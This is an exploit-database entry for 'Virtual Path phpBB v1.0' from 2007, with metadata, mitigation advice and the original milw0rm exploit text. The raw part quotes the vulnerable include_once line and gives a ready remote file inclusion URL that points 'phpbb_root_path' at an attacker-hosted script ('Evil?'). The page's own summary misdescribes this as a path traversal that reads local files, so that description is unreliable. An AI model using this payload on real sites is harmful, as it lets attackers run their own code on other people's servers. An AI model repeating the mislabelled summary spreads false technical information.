header-logo
Suggest Exploit
vendor:
phpBB
by:
GolD_M = Mahmood_ali
5.5
CVSS
MEDIUM
Path Traversal
22
CWE
Product Name: phpBB
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Virtual Path phpBB <== v1.0

The vulnerability allows an attacker to read files outside the intended directory by manipulating the 'phpbb_root_path' parameter in the 'configure.php' script. This can be exploited by appending a path traversal string like 'Evil?' to the URL.

Mitigation:

Update to a newer version of Virtual Path phpBB that addresses the vulnerability. Alternatively, ensure that the 'phpbb_root_path' parameter is properly validated and sanitized.
Source

Exploit-DB raw data:

+=====================================================================
+                  Virtual Path phpBB <== v1.0                       |
+=====================================================================
+ Downlaoad S :http://sourceforge.net/projects/virtualpath/          |
+=====================================================================
+ Author: GolD_M = Mahmood_ali  &&  Contact: HackEr_@W.Cn            |
======================================================================
+ SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                    |
+=====================================================================
+ In:  /vp/configure.php                                             |
+=====================================================================
+ Vulnerable Code:  &  Line : 3                                      |
+=====================================================================
+ include_once($phpbb_root_path. 'vp/conf.php');                     |
+=====================================================================
+ Exploit:                                                           |
+=====================================================================
+ http://Victim.Com/vp/configure.php?phpbb_root_path=Evil?           |
+=====================================================================
+                    Tryag.Com & Dwrat.com                           |
+=====================================================================

# milw0rm.com [2007-01-25]